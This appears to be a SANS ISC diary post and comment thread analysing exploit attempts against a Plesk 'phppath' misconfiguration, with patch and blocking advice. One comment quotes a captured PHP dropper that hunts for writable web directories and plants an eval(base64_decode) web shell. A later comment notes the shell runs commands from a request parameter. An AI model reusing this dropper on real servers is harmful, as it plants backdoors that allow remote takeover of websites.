Thanks to a reader for sending in this log entry from his Apache Server:
Russ quickly decoded it to:
This appears to be an exploit attempt against Plesk, a popular hosting management platform. A patch for this vulnerability was released in June [1]. We covered the vulnerability before, but continue to see exploit attempts like above. The exploit takes advantage of a configuration error, creating the script alias "phppath" that can be used to execute shell commands via php. The exploit above runs a little shell one-liner that accomplishes the following:
Please let us know if you are able to capture the body of the request! Thanks to another reader for submitting a packet capture of a full request: The Headers:
This payload will just print the string ___2pac, likely to detect if the vulnerability exists. No user agent is sent, which should make it easy to block these requests using standard mod_security rules.
[1] http://kb.parallels.com/en/116241
------ |
Johannes 4108 Posts ISC Handler Jul 30th 2013 |
Thread locked Subscribe |
Jul 30th 2013 7 years ago |
This is the body of the POST that went through my network:
<?php echo "Content-Type:text/html\r\n\r\n";echo "___2pac\n"; ?>HTTP/1.1 |
Tom 1 Posts |
Quote |
Jul 30th 2013 7 years ago |
Thanks for providing the body. I added it to the article. Now the next question: What will they send if the "___2pac" string is returned. Tempted to add that to some of my pages
![]() |
Johannes 4108 Posts ISC Handler |
Quote |
Jul 31st 2013 7 years ago |
Looks like the Plesk vuln scanner sent to Pastebin in June (http://pastebin.com/mKvFNdzp)
|
Anonymous |
Quote |
Jul 31st 2013 7 years ago |
Silly question, where do you start to fix or workaround?
|
Lornz 1 Posts |
Quote |
Jul 31st 2013 7 years ago |
Parallels offers patches for the problem here: kb.parallels.com/en/…
Quote: |
Johannes 4108 Posts ISC Handler |
Quote |
Jul 31st 2013 7 years ago |
I wonder whose brilliant idea it was to have a PHP command line option for overriding php.ini defined security settings?
I for one think PHP needs a new option lock_settings_list="disable_functions ...." or some other mechanism to specify "PHP Ini settings that cannot be overriden, period; no matter what." |
Mysid 146 Posts |
Quote |
Aug 2nd 2013 7 years ago |
Caught partially this
{ if (is_writable($pfile)) $wdirs[]=$pfile; if ($level> 0) $wdirs = array_merge($wdirs,scandirs($pfile , $level-1)); } } closedir($handle); return $wdirs; } $sn='';$r=rand(5,8);for($i=0;$i <$r;$i ){$sn.=chr(rand(97,122));}$sn.='.php'; $dr = $_SERVER['DOCUMENT_ROOT']; $dr = ($dr[strlen($dr)-1]=='/' || $dr[strlen($dr)-1]=='\\')?substr($dr, 0 , strlen($dr)-1):$dr; $wa_dirs = scandirs($dr , 2); if(is_writeable($dr))$wa_dirs[]=''; //print_r($wa_dirs); foreach ($wa_dirs as $d) { $spn=substr($d, strlen($dr)).'/'.$sn; if($f=fopen($dr.$spn,'w')){ fputs($f," <?php eval(base64_decode('Lyo7...ldOUycqLy8qUT5WKi87Lyo0WlgqLw==')); ?> ");fclose($f); exit('--start-check'.'string--'.$spn.'--end-check'.'string--'); } } |
Nikolai Besschetnov 2 Posts |
Quote |
Sep 9th 2013 7 years ago |
It is basic shell which executes command in $_REQUEST['emydtf']
|
Nikolai Besschetnov 2 Posts |
Quote |
Sep 9th 2013 7 years ago |
Sign Up for Free or Log In to start participating in the conversation!